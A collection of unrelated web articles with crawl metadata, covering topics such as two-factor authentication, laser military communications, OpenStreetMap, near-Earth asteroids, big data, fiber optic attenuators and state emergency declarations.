Enable two-factor authentication: Many websites now offer two-factor (or two-step) authentication, which adds an extra layer of security to your account by requiring you to enter your password, plus a code that you will receive on your mobile device via text message or a token generator to login to the site. This may add complexity to the login process, but it significantly improves the security of your account. If nothing else, use this for your most important accounts.
The average user has 26 password-protected accounts but typically uses only five different passwords, says Symantec. In 2013, the two most common passwords were “123456” and “password.”
Consumers are experiencing password fatigue, and are resistant to regularly updating their passwords. A Symantec survey indicated that 38 percent of people would rather clean a toilet that come up with a new password.
The number one cause of breaches and compromised records in large organizations is stolen credentials, and research asserts that 80 percent of data breaches could have been eliminated with the use of two-factor authentication. | <urn:uuid:7ffd9118-bd89-4bfb-88a9-931fffd3958c> | CC-MAIN-2017-04 | https://www.helpnetsecurity.com/2014/08/08/five-steps-to-take-to-protect-your-passwords/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280280.6/warc/CC-MAIN-20170116095120-00237-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.926731 | 625 | 2.953125 | 3 |
For years, the military has looked for a communications technology that can't be intercepted. Technology has advanced to where transmitting morse code-like messages isn't terribly useful or secure, and laying down ethernet cables in a war zone often is impractical or impossible.
But lasers could be the answer.
An infrared laser system called free space optical communications is being developed by the Air Force Research Lab at Wright-Patterson Air Force Base in Ohio and Fayetteville, Ark.-based Space Photonics. The beam is so narrow that it cannot be snooped on unless the snooper is directly in the beam's path, in which case the signal will stop. An attempt to intercept and retransmit the signal to fool the system into continuing transmission likely wouldn't work because the system functions as a “line of sight” device.
"It's inherently secure," said Terry Tidwell, chief engineer at Space Photonics, which recently signed a deal to commercialize its technology and sell it to the Department of Defense, NBC News reported. High bandwidth is another benefit to laser communications – while Wi-Fi signals can transmit megabits of data each second, an infrared laser beam can carry thousands of times more data.
Other companies are also picking up on the capabilities of laser communication technology, such as ITT Exelis, which received a $7 million contract to finish developing a ship-to-shore communications system for the Navy. By the end of next year, a company official said, the system should have a range of about 12 miles.
Laser based communications systems like these were first proposed in the 1970s, but their use was cost prohibitive, and fiber optic cable was found to be a more practical alternative. Current laser technology is limited to several miles of transmission through air, but the range can be extended to about 120 miles with the use of aircraft at high altiutude. Environmental factors, like fog, are still seen as technical barriers to the technology, but researchers have said they believe there is potential worth exploring. | <urn:uuid:f5eca662-f19f-4aac-a5eb-fc4d5e9c8fe0> | CC-MAIN-2017-04 | http://www.govtech.com/Air-Force-Develops-Communications-Lasers.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280888.62/warc/CC-MAIN-20170116095120-00053-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.969364 | 417 | 2.90625 | 3 |
OpenStreetMap is a marvel of modern crowdsourcing. Since its creation in 2004, DIY cartographers – typically armed with GPS devices or satellite photography – have been slowly mapping the world's road networks and landmarks to create a free alternative to proprietary geographic data that can then support tools like trip planners. The process, which began in the U.K., is painstaking and piecemeal, and nearly a decade into it, more than a million people have contributed a sliver of road here or a surveyed cul-de-sac there.
Academics refer to this kind of collaborative mapmaking as "volunteered geographic information," and OpenStreetMap is one of the most successful examples of it out there. Research into the system suggests that these amateur maps are impressively accurate in communities dense with contributors (like Germany: Germans love OpenStreetMap). But until now, it's been much easier to assess how good these maps are than to ask how they got that way.
Now, researchers are getting much better at processing OpenStreetMap's data to access its history. The above historic timelapse comes from a study, published in the journal Spatial Statistics, that retraced the growth of OpenStreetMap networks in three areas of Ireland to understand how the networks are built. | <urn:uuid:f3e73f4b-d362-45d7-b3cc-4490dc3b1a9a> | CC-MAIN-2017-04 | http://www.nextgov.com/big-data/2013/03/mapping-growth-openstreetmap/61929/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280888.62/warc/CC-MAIN-20170116095120-00053-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.961744 | 258 | 3.671875 | 4 |
NASA continues to get a better handle on the asteroids buzzing around in space saying today that there are roughly 4,700 potentially hazardous asteroids, or as NASA calls them PHAs. NASA says these PHAs are a subset of a larger group of near-Earth asteroids but have the closest orbits to Earth's - passing within five million miles (or about eight million kilometers) and are big enough to survive passing through Earth's atmosphere and cause damage on a regional, or greater, scale.
NASA points out too that ''potential'' to make close Earth approaches does not mean a PHA will impact the Earth. It only means there is a possibility for such a threat.
RELATED: The sizzling world of asteroids
The new numbers come from asteroid observations made by NASA's Wide-field Infrared Survey Explorer, (WISE) satellite which looked at the objects that orbit within 120 million miles of the of the sun into Earth's orbital vicinity, NASA said. WISE scanned the celestial sky twice in infrared light between January 2010 and February 2011, continuously snapping pictures of everything from distant galaxies to near-Earth asteroids and comets. It has since entered hibernation mode, NASA stated. The asteroid-hunting portion of the WISE mission called NEOWISE has seem more than 100 thousand asteroids in the main belt between Mars and Jupiter, in addition to at least 585 near Earth, NASA noted.
Specifically NASA said NEOWISE sampled 107 PHAs to make predictions about the entire population as a whole. Findings indicate there are roughly 4,700 PHAs, plus or minus 1,500, with diameters larger than 330 feet (about 100 meters). So far, an estimated 20 to 30% of these objects have been found, NASA stated. Previous estimates of PHAs predicted similar numbers, they were rough approximations, NASA said.
"The NEOWISE analysis shows us we've made a good start at finding those objects that truly represent an impact hazard to Earth," said Lindley Johnson, program executive for the Near-Earth Object Observation Program at NASA Headquarters in Washington. "But we've many more to find, and it will take a concerted effort during the next couple of decades to find all of them that could do serious damage or be a mission destination in the future."
Asteroids have been in the news a lot lately. It has been widely reported that NASA could announce this month a manned project to land on an asteroid in the future. And in April Google executives Larry Page and Eric Schmidt and filmmaker James Cameron said they would bankroll a venture to survey and eventually extract precious metals and rare minerals from asteroids that orbit near Earth. Planetary Resources, based in Bellevue, Wash., initially will focus on developing and selling extremely low-cost robotic spacecraft for surveying missions.
And of course Doomsday 2012 scenarios have abounded in the news for a long time. NASA has spent some time shooting these theories down - including one of a world ending asteroid. "The Earth has always been subject to impacts by comets and asteroids, although big hits are very rare. The last big impact was 65 million years ago, and that led to the extinction of the dinosaurs. We have already determined that there are no threatening asteroids as large as the one that killed the dinosaurs. For any claims of disaster or dramatic changes in 2012, where is the science? Where is the evidence? There is none, and for all the fictional assertions, whether they are made in books, movies, documentaries or over the Internet, we cannot change that simple fact," NASA stated.
Layer 8 Extra
Check out these other hot stories: | <urn:uuid:9cfeb284-f6df-45ca-8740-8ca0ce5d8263> | CC-MAIN-2017-04 | http://www.networkworld.com/article/2222410/security/nasa-counts-4-700-potentially-hazardous-near-earth-asteroids.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282140.72/warc/CC-MAIN-20170116095122-00447-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.957245 | 734 | 3.6875 | 4 |
You hear it almost as often as "cloud computing" these days. Around every corner of the internet is another headline talking about "Big Data", but what is it, exactly? When data sets grow so large and complex that they are difficult to manage with traditional databases or processing tools, that's Big Data. Almost every organization I talk to has their own definition of what they think encompasses Big Data: SMBs mention anything in the multi-terabyte range, enterprises are eyeing petabytes and exabytes, and meanwhile the government (like the NSA's massive Utah data center) are sorting through zettabytes and yottabytes. The use of cloud computing to manage Big Data is on the rise, too.
How much is a yottabyte? To store (not process, but save) a yottabyte of information on the most compact microSDXC cards, you would need enough cards to build the Pyramid of Gisa.
An infographic from Intel titled “What happens in an Internet Minute” helps put Big Data into perspective. This graphic illustrates that in one minute 639,800 gigabytes of global IP data is transferred, equivalent to 204 million emails sent, 61,141 hours of music streamed over Pandora, six million Facebook views from 277,000 logins, over two million Google searches, or 1.3 million video views with 30 hours of video uploaded to YouTube. The growth continues in a staggering manner. Today there are as many network devices as the global population. By 2015 that number will grow twice the global population. That means in just two years it would take a human five years just to view all of the video data crossing IP networks each second.
Further contributing to this growth is the rise of M2M traffic or Machine-to-Machine communication. You may have seen the Cisco commercials mention the term of “the internet of things”, covering everything that can be connected to a network, from talking light switches to automated doors to shopping carts all centrally stored and controlled via network. This is M2M in action. One division of GE is equipping their new turbines with 250 sensors in each of its 5000 turbines, enabling real-time data processing via centralized monitoring facility, where they are on the lookout for leading issues, such as temperature on the bearings, vibrations, exhaust and other areas that signal the health of the machine. When readings fall outside safe predefined levels, GE technicians can get a jump start on fixes before mechanical errors or breakdown occur, enabling power to be sold on a per-hour basis. GE states that “for some customers just one hour of stoppage can cost $2 million in electrical output”. With those kinds of costs, would you rather have a machine notify you before an outage that something is wrong, or watch a technician with a toolbox diagnosing a busted turbine? Big Data can take it one step further: through predictive analysis, technicians can even discover when a turbine might fail and what steps to take to prevent that failure.
With all this data being generated the largest problem Big Data presents is how best to sort through and process everything. Data storage is only one obstacle. You also have to process and provide analysis. There are many software companies creating products manufacturers use to collect data from their machines, analyze it, and integrate the data into their business systems. The manufacturers can then use this machine data to understand usage and behavior, build models, and figure out new ways to drive value. While these Enterprise Resource Management (ERP) and other tools have been common in manufacturing for some time, this is now true across all sectors.
At Green House Data, we see many organizations starting to leverage MapReduce algorithms and Hadoop software frameworks to pull value out of their data. For example, it’s not uncommon for a hospital to query their data for “the number of times a women 30-40 received a mammogram in Wyoming”. Car dealers may search for the “age and sex of sedan buyers per day of the week” to help their sales force discover when they should market their new sedans and what demographic to focus on.
Whether you're dealing with terabytes or exabytes of data, new forward-thinking ideas are needed to keep up with the amount of data being generated and resources needed to store and process it. For a cost effective solution small and large businesses alike are frequently turning to the cloud to provide the needed resources to deal with Big Data, as cloud deployments enable fast-scaling, easily implemented and low cost infrastructure, ideal for experimenting with and crunching ever-increasing data sets. Despite its murky definition, what Big Data boils down to improving efficiency and increasing revenue by tracking and analyzing every aspect of your business. A valuable tool, indeed.
Posted By: Cortney Thompson | <urn:uuid:bfb76b62-6bc8-4c45-a343-8d92fc5e3bec> | CC-MAIN-2017-04 | https://www.greenhousedata.com/blog/getting-to-the-bottom-of-big-data | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280730.27/warc/CC-MAIN-20170116095120-00567-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.943188 | 977 | 3.046875 | 3 |
Over the years we've heard people warning/lamenting/complaining about Earthlings leaving their junk all over this part of the solar system, whether it's dead satellites floating through space or abandoned equipment left on the surface of the moon or a nearby planet. But now scientists are raising the prospect of us inadvertently transporting to Mars bacteria that is able to survive. Two microbiologists at the University of Florida recently tested some Earth microbes under harsh Mars-like conditions. Here's how Discovery.com's Markus Hammonds describes it:
Wayne Nicholson and Andrew Schuerger ... didn’t choose just any old bacteria, though. The microbes in question were taken from samples of Russian permafrost, collected over 12 meters (40 feet) below ground. These bacteria were first nurtured for 28 days in nutrient-rich dishes kept at normal Earth conditions. Then around 10,000 colonies of the bacteria were subjected to 30 days of conditions intended to mimic Mars, at temperatures of 0°C (32°F) and a pressure of just 7 millibars — the same pressure on the surface of Mars.Six of the bacterial colonies tested, containing a strain known as carnobacterium, managed to grow under these harsh conditions. In fact, surprisingly, the carnobacterium colonies grew better at low pressures and without oxygen than they did under more normal conditions. The reasons why aren’t entirely clear.
As Hammonds points out, six out of 10,000 isn't much. But it's six more than zero. Further, it was "the first time Earth microbes have ever been successfully grown at such a low pressure," he writes. No matter how much we try, it's virtually impossible to guarantee that every piece of equipment we send into space is fully sterilized. Something's going to make it on board (indeed, some have expressed fears that Curiosity Rover may have transported bacteria in its wheels). And its chances of survival in a harsh, alien environment will be exceedingly slim. Except for the mutant strain, of course. Now read this: | <urn:uuid:b5749b7b-9bb0-47bb-bfcb-c8e237533c2d> | CC-MAIN-2017-04 | http://www.itworld.com/article/2713275/enterprise-software/what-if-we-re-inadvertently-sending-earth-bacteria-to-mars-.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279923.28/warc/CC-MAIN-20170116095119-00017-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.952368 | 417 | 4.09375 | 4 |
Get Instant Access
To unlock the full content, please fill out our simple form and receive instant access.
The CAD Operator's role is to prepare complex drawings, diagrams, and documents using computer-aided design (CAD) software within the organization. This includes developing CAD files based on notes, sketches, engineering schematics, technical guides, vendor information, and so on. The CAD Operator will produce CAD files in a timely and accurate fashion. This position may include duties involving artwork and other graphical elements. | <urn:uuid:77b0a8aa-0039-49d0-b7a4-23c99ce43724> | CC-MAIN-2017-04 | https://www.infotech.com/research/cad-operator | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279169.4/warc/CC-MAIN-20170116095119-00532-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.89645 | 104 | 2.578125 | 3 |
In a thought-provoking piece over at ZDNet, Numerical Algorithms Group’s Andrew Jones takes a look at the supercomputing power consumption equation, examining whether its current trajectory might not be so untenable.
There are a range of estimates for the likely power consumption of the first exaflops supercomputers, which are expected at some point between 2018 and 2020. But probably the most accepted estimate is 120MW, as set out in the Darpa Exascale Study edited by Peter Kogge (PDF).
At this figure, the supercomputing community panics and says it is far too much — we must get it down to between 20MW and 60MW, depending who you ask — and we worry even that is too much. But is it?
What follows is a comparison of today’s largest supercomputers with their closest kin, major scientific research facilities.
In Jones’ opinion:
[T]he largest supercomputers at any time, including the first exaflops, should not be thought of as computers. They are strategic scientific instruments that happen to be built from computer technology. Their usage patterns and scientific impact are closer to major research facilities such as Cern, Iter, or Hubble.
Thinking of the big supercomputers that way, their power consumption and other costs — construction, operation, and so forth — are comparable to other major research centers and not that outrageous, concludes Jones.
Jones also tackles the subject of whether it makes sense to continually improve and replace systems every couple of years (as we currently do) or whether it would offer more value to society to collaborate on the construction of one mega-supercomputer every decade – putting ten years of resources into it, and then relying only on that system for ten years. There are, of course, pros and cons to each path. Because supercomputing performance increases exponentially, the first option results in a greater number of exflops per year, but also think of the resources saved with the second option by not having to continually rewrite and validate code and the value to society in having a 2030-era system ten years ahead of schedule.
Jones is not sold on either path, but wonders why we are so set on the first option without giving some consideration to the second. Check out the full article for more in-depth treatment of these ideas. | <urn:uuid:f13f00c9-5740-496e-a7a2-501a980b48c2> | CC-MAIN-2017-04 | https://www.hpcwire.com/2010/09/24/supercomputing_energy_use_getting_a_bad_rap/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280774.51/warc/CC-MAIN-20170116095120-00256-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.939701 | 490 | 2.828125 | 3 |
The seventh-grade classroom at Aptos Middle School buzzed with animated kids, many of whom whispered to friends and shot curious looks at the visitors scattered around their classroom.
Local politicians, the superintendent of schools and media visited the classroom of 25 kids last Friday to watch a special lesson designed to teach children how to protect themselves online. All 55,000 elementary to high school students in San Francisco got the lesson on the same day, part of fulfilling a new requirement to a U.S. law called the Children's Internet Protection Act (CIPA). To get federal funding, public schools have to instruct students how to protect their privacy, avoid cyberbullying and practice ethical behavior online.
You can watch an IDG News Service video of the classroom here.
The U.S. is the only nation that requires online safety instruction at public schools, but other countries may soon join it. The European Commission is mulling over a law that would mandate educating kids about online safety, and in the UK, newly appointed adviser on childhood, Claire Perry, is talking about the need to make online safety part of the public school curriculum.
But much of what is taught about online safety is not rooted in evidence, according to Stephen Balkam, CEO of the Family Online Safety Institute, a global organization based in Washington, D.C.
"There's precious little research on the effectiveness of online safety education," said Balkam, who also worries that a fear-based message about the dangers online can overlook the Internet's many benefits.
The U.S. Department of Education cites a 2008-2009 poll that shows 28 percent of students reported being bullied at school, while 6 percent were bullied online.
The next public event to draw attention to kids' use of the Internet is coming up on Feb. 5, when the EU and U.S. will observe Safer Internet Day. | <urn:uuid:c3f8decf-7618-41af-9cf7-b12db702bf6f> | CC-MAIN-2017-04 | http://www.itworld.com/article/2715278/networking-hardware/a-lesson-in-cyberbullying.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282935.68/warc/CC-MAIN-20170116095122-00558-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.957205 | 383 | 3.171875 | 3 |
What is Intelligent Word Recognition?
Intelligent Word Recognition uses artificial intelligence to recognize whole words in a document instead of individual characters (which is how Optical Character Recognition / OCR works). For example, when an OCR system is extracting the word “dog” from a document, it will recognize “d”, “o”, and “g”. IWR will match the letters to a dictionary and extract the whole word, “dog” based on pattern recognition and matching algorithms.
Captricity delivers more than both approaches.
Intelligent Word Recognition does not recognize names and numbers not housed in a catalog or dictionary. While Captricity uses OCR algorithms as a first pass on every data capture job, we have tweaked our algorithms with machine learning and pattern recognition to deliver higher results than standard OCR systems. But what really sets Captricity apart from IWR and OCR is crowdsourcing. To ensure accuracy, every data field is verified by between one and five people, enabling our stellar 99% accuracy rate.
Captricity and crowdsourcing
Captricity uses crowdsourcing to verify the data contained in every field we capture. When customers set up their initial job, they upload a blank version of the document they need extract information from. They then use our system to delineate which fields need to be digitized. Each form is “shredded” into distinct fields and each field is verified by one or more people. Since no one person can see more than one field from each document, privacy is maintained. | <urn:uuid:2d4f5a68-b22c-4db7-977d-4630f90af63e> | CC-MAIN-2017-04 | http://captricity.com/intelligent-word-recognition/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279189.36/warc/CC-MAIN-20170116095119-00376-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.919763 | 327 | 3.125 | 3 |
is a special kind of tree data structure in which items are stored and
accessed based upon their key value alone, not based upon their key
value in relation to others in the tree. In contrast, recall that a
binary search tree
uses a greater-than or less-than relationship between keys in the tree
to determine where a new insertion would be placed. In tries, the new
insertion's place is predetermined based on its key value. For this
reason a trie is somewhat of a cross between a tree and a hash table.
Tries can only be used when the range of valid keys to be stored is
known up-front. To store a new item in a trie, that item's key value
is somehow broken down into components. If, for example, the item to
be stored is a string, a logical way to break its value down is by
letter. For a number, perhaps a good way to break down the key value
is by digits in its binary representation. Every internal node in a
trie can have as many child nodes as the number of items in the
alphabet you are storing. That is, if you are traversing on English
letters each node can have up to 26 children. If you are traversing
on binary digits, each node can have two children, 0 or 1.
Imagine we have a trie in which we are storing strings. We wish to
store the new item ``dog'' in the trie. From the root node we follow
the ``d'' edge and arrive at a child node. The only data stored in
leaves under this child node are words that begin with the letter
Next, we traverse along the ``o'' link from the ``d'' node. We reach
yet another internal node under which only words which start with the
prefix ``do'' are stored. Finally suppose we find that there is no
``g'' link off the ``do'' node. We create one and store ``dog'' at this
new leaf node.
Likewise, if we want to store the number six (6) in a numeric trie, we
might convert six to it's binary representation (110). From the first
node we follow the ``1'' edge. Next we traverse down the ``1'' edge
again. And finally we store the value six in a leaf node that is lies
along the ``110'' edges from the root node.
Any path from the root to a leaf in a trie corresponds to the value of
the item stored at the leaf node reached.
the data structures behind Huffman data compression algorithms, are a
popular use of tries. Huffman coding
is discussed in the data compression section of this document. | <urn:uuid:4c41078f-2529-426a-9f1d-765b7af54d51> | CC-MAIN-2017-04 | http://www.darkridge.com/~jpr5/mirror/alg/node38.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280801.0/warc/CC-MAIN-20170116095120-00100-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.911117 | 571 | 4.0625 | 4 |
As malicious hackers and identity thieves become more sophisticated, a password is no longer a foolproof way to control remote access to a government network. Increasingly IT managers turn to two-factor authentication to add a second electronic lock to the door that guards their organization's information systems.
The keys used to unlock authentication systems come in three varieties: something you know, such as a memorized password or personal identification number (PIN); something you have, perhaps a swipe card or an access badge; or who you are, established by a fingerprint or retinal scan, for example.
A two-factor authentication system requires a user to present two keys, chosen from two of the three categories, to get into a network. If you've ever inserted a debit card in an automated teller machine and then entered your PIN, you're familiar with the concept.
Two Are Better Than One
Two-factor authentication is becoming more popular in government.
"Post-9/11, there's a definite need to secure local government agencies," said Martin Naughton, IT director of Roselle, N.J.
In 2005, Roselle implemented the ProtectID authentication system from StrikeForce Technologies to protect confidential information on the network used by all municipal employees, including personnel who access applications from their desktops, and department heads and others who sometimes use a virtual private network (VPN) to log on remotely.
Before 2005, Roselle used Microsoft Windows Authentication, which required a user name and password to access the network. That didn't offer enough protection, Naughton said, because when an employee used the network to access the Internet, he or she sometimes encountered Web sites that installed spyware or other invasive code.
"People in the outside world would be able to access local passwords, possibly gain access to our network, and then go into the police department network," he explained.
To increase security, the IT department required users to change their passwords on a regular basis, but many refused, according to Naughton.
"If they did change it, they would forget what they changed it to over the weekend," he said. "That would require my time to reinitialize the password for them."
When Naughton researched two-factor authentication, he was especially interested in solutions that use tokens. A token is a "what you have" form of authentication that displays an identification code, and is usually small enough to fit on a key chain. Some tokens can be programmed to generate and display a series of pseudo-random numbers that change at regular intervals, for example, every 60 seconds.
To access the network, the token user enters the code currently displayed by the token at the given time. A token may also plug directly into a computer via the USB port, providing the current code automatically.
Naughton said he was drawn to the two-factor system because StrikeForce offered software-based tokens along with the hardware tokens with electronic displays -- something Roselle might consider in the future. Software-based tokens can run on desktop or notebook computers, BlackBerries, personal digital assistants or cell phones enabled with Java or BREW software.
With the network protected with two-factor authentication, a user is still required to enter a password to log on. He or she enters the current code from the token. Each token is registered on an authentication server, which runs the same algorithm as the token. The token and server are synchronized so that when the token code changes, the authentication server makes the same change.
"Every 60 seconds, the software that's running on the server also changes its six-digit number to correspond with the number on the key ring," said George Waller, executive vice president of StrikeForce.
In case a user misplaces or damages a token, Roselle has also chosen a backup authentication method from the company. When the user logs on, the display screen asks if he or she wants to use the token or a second method, based on a cell phone.
If the second method chosen is the cell phone, the user receives a call within a few seconds. The user then enters a memorized PIN on the telephone keypad. This is called "out-of-band" authentication, because the system receives the PIN over a telephone network rather than the Internet or local area network.
Using a PIN alone isn't considered very secure -- a hacker can steal it if it's written down, or may figure it out via social engineering -- however, the company's method adds an extra safety measure by relying on "what you have," Waller said.
The system places a call only to the phone that's registered with the server. So if a hacker were to break into a protected network with a stolen PIN, he would also have to steal the employee's cell phone.
If Roselle implements software-based tokens in the future to supplement the hardware devices, its network will gain yet a third layer of protection.
When an end-user downloads the token software, ProtectID takes a "hash" of that person's device and stores it on the authentication server. A hash, Waller explained, is a snapshot of the identification numbers -- such as serial numbers and IP addresses -- of several components within the device. The hash uniquely identifies that computer, PDA or cell phone.
"Think of it as a digital fingerprint," he said.
When someone uses the device to remotely log on to the system, the software compares the device with the hash to verify that it's a particular person's machine and no one else's. A nontrusted device cannot access the network.
Along with hardware and software tokens, and cell phone authentication, StrikeForce offers several other ways to control remote access to a network. They include fingerprint readers, iris scanners and smart cards, Waller said.
Because employees use the software to access the municipal network from their desks and remote computers, Naughton asked the company to customize the system to give him a sort of skeleton key to those machines.
"Say a user puts in a request for me to do some work on their computer, they're not in the office that day, and I decide I have time that day to do it," he explained. "For me to log on to that user account, I would need that token."
Now that Roselle employees must present two kinds of authentication, it's considered safe to keep using the same password, so it's no longer mandatory for users to change passwords every 30 days -- a big plus, Naughton said.
Tokens are generally advantageous as a second authentication key, said Naughton. For example, if a vendor's representative needed remote access to Roselle's network to provide upgrades or perform maintenance, Naughton would give the representative a temporary VPN password and read off the ID displayed on the token over the phone. This allows Naughton to monitor the network and give the vendor access only as needed.
"They're not coming [into the network] off-hours without my knowledge," he said, adding that along with those benefits comes the most essential one. "The knowledge that I'm operating a secure network now takes a lot off my mind." | <urn:uuid:27e117cc-4cb9-4244-96a7-89caa0143104> | CC-MAIN-2017-04 | http://www.govtech.com/magazines/gt/Halt-Who-Goes-There.html?page=2 | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560283008.19/warc/CC-MAIN-20170116095123-00402-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.940351 | 1,472 | 2.71875 | 3 |
A campaign is underway to construct a never-before-built steam powered computer originally designed by the visionary engineer Charles Babbage.
The Analytical Engine was first conceived in 1837, constructed out of iron and brass and while Babbage fashioned parts of the revolutionary machine over the years, a complete functioning Analytical Engine was never built.
A group hopes to change that by gathering private support from what it is hoped will eventually be 50,000 individuals to fund the build. Over 1,600 have already pledged a donation towards the cause.
The man behind the campaign, John Graham-Cumming, originally mooted the idea on plan28.org but which more recently has escalated to a project on Pledge Bank and a Q&A session on Reddit to explain the idea.
“Babbage left behind extensive documentation of the Analytical Engine, the most complete of which can be seen in his Plan 28 (and 28a), which are preserved in a mahogany case that Babbage had constructed especially for the purpose,” write Graham-Cumming in an article earlier this month.
“It might seem a folly to want to build a gigantic, relatively puny computer at great expense 170 years after its invention,” admits Graham-Cumming but pointed out that the true value of a completed Babbage Analytical Engine lies in the idea that it is possible to be 100 years ahead of your time.
“With support, this type of "blue skies" thinking can result in fantastic changes to the lives of everyone. Just think of the impact of the computer and ask yourself how different the Victorian world would have been with Babbage Engines at its disposal.”
Image credit: Catherine Helzerman | <urn:uuid:11cc3c02-f78a-4dd1-b6fd-7aa7650551c0> | CC-MAIN-2017-04 | http://www.pcr-online.biz/news/read/plan-to-build-babbage-steam-computer | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560285337.76/warc/CC-MAIN-20170116095125-00310-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.960644 | 354 | 3.171875 | 3 |
So why do We Need a Fiber Optic Attenuator?
Bigger is much better, right? Or so many people believe. Beginners in fiber optic technology are often confused with why optic attenuators should reduce light intensity. Aren’t we using amplifiers to improve the signal electricity? The fact is that too much light can overload a fiber optic receiver. Optical fiber attenuators are needed when a transmitter delivers too much light, such as when a transmitter is very close to the receiver.
So how exactly does a Fiber Attenuator Work?
Attenuators usually works by absorbing the sunshine, such as a neutral density thin film filter. Or by scattering the sunshine such as an air gap. They should not reflect the light since that could cause unwanted back reflection within the fiber system. Another type of attenuator utilizes a length of high-loss optical fiber, that operates upon its input optical signal power level in such a way that it is output signal power level is less than the input level. The power reduction are done by such means as absorption, reflection, diffusion, scattering, deflection, diffraction, and dispersion, etc.
What’s the Most Important Feature Should a Fiber Attenuator Have?
The most crucial spec of an attenuator is its attenuation versus wavelength curve. Attenuators should have the same impact on all wavelengths used in the fiber system or at least as flat as possible. For instance, a 3dB attenuator at 1500nm should also lessen the concentration of light at 1550nm by 3dB or as close as possible, this is also true inside a WDM (Wavelength Division Multiplexing) system.
Different Types of Attenuators
There are two functional kinds of fiber attenuators: plug style (including bulkhead) and in-line. A plug style attenuator is utilized like a male-female connector where attenuation occurs inside the device, that’s, on the light path from one ferrule to another. Included in this are FC fiber optic attenuator, LC attenuator, SC attenuator, ST attenuator and much more. An in-line attenuator is connected to a transmission fiber by splicing its two pigtails.
The key of operation of attenuators are markedly different simply because they use various phenomena to lower the power of the propagating light. The easiest means would be to bend a fiber. Coil an area cable several times around a pencil while measuring the attenuation with a power meter, then tape this coil. Then you definitely got a primitive but working attenuator.
Most attenuators have fixed values which are specified by decibels (dB). They’re called fiber optic fixed attenuator. For instance, a -3dB attenuator should reduce intensity of the output by 3dB. Manufacturers use various light-absorbing material to attain well-controlled and stable attenuation. For instance, a fiber doped with a transition metal that absorbs light in a predictable way and disperses absorbed energy as a heat.
Variable optical attenuator is also available, but it is usually a precision instrument utilized in making measurements. From FiberStore, you can get the best Variable Attenuators Instrument. | <urn:uuid:167e92ac-fdbc-4c7d-96fd-494588e714f0> | CC-MAIN-2017-04 | http://www.fs.com/blog/what-you-need-to-know-before-you-purchase-fiber-optic-attenuators.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280133.2/warc/CC-MAIN-20170116095120-00128-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.926158 | 678 | 2.890625 | 3 |
If it seems as if the whole country is in a "state of emergency," that's because most of it is. And that was before Hurricane Rita made landfall.
Fully 45 states, plus the District of Columbia, are now in a federally recognized state of emergency
as they take in the gulf coast residents displaced by Hurricane Katrina. President Bush also declared four of those states, where Katrina came ashore, "disaster" areas. By comparison, only Virginia and New York were declared federal disaster areas following the terrorist attacks in 2001.
This year, states are using various types of emergency and disaster declarations to deal with plenty of problems -- from hurricanes to drought to rampant crime.
For example, the governors of New Mexico and Arizona issued state emergency declarations in August because of widespread crime, damaged livestock and other problems in border communities beset with illegal immigrants and drug traffickers.
"The declaration ... helps free up red tape; it makes money easier to use," said Peter Olson, a spokesman for the New Mexico Department of Public Safety.
Both state and federal governments can declare emergencies or disasters. Generally speaking, the declarations give governments -- and their leaders -- powers they would not normally have.
A gubernatorial order, for example, usually allows a governor to mobilize the National Guard, suspend state laws, spend state money and order an evacuation. It means the state can step in to use its resources when local governments are overwhelmed.
The governor's declaration is also the first step in a process that allows states to recoup costs from the federal government for post-disaster cleanups or short-term evacuee housing.
The federal government can step in only when states ask for help. If a state is overwhelmed, though, federal aid can prove extremely valuable. The U.S. government, for example, has declared it will cover 100 percent of the cost of housing evacuees from Hurricane Katrina in states not hit by the storm.
Even without federal involvement, state declarations can help. New Mexico Gov. Bill Richardson (D) used a state declaration of emergency
last month to send more police to his state's four border counties. He instructed state workers to build a fence to protect livestock near the town of Columbus.
The move immediately freed up state money in a special emergency fund that Richardson used to staff a new field office of the New Mexico Department of Homeland Security
But neither Richardson nor Arizona Gov. Janet Napolitano (D) have received federal assistance for the emergency. Richardson didn't ask for it. Napolitano recently asked the feds for more time to apply, because, she explained, Arizona's emergency management services have been focused on the Katrina refugees.
In any event, the declarations proved to be an effective political tool.
Bush pledged to beef up border security in response to the concerns of the two governors. The U.S. Border Patrol assigned 86 more agents to its Deming Station, the office that monitors New Mexico's international border. The Mexican state of Chihuahua also razed abandoned buildings in a border town that Richardson said were used as a staging ground for drug- and people-smuggling operations.
Without a request from a governor, the federal government cannot send disaster or emergency relief. The federal Stafford Act
requires that states activate their emergency response plan before asking the president for federal assistance.
The Stafford Act, first enacted in 1988, spells out the differences between a federal emergency and a federal disaster.
Disasters declarations are for catastrophic situations and, therefore, allow for greater federal help. They're used in situations such as tornadoes, landslides, floods and terrorist attacks. Before hurricane season, all of the federal states of emergency this year dealt with record or near-record snowfalls.
In both cases, the U.S. government picks up at least 75 percent of the cleanup costs.
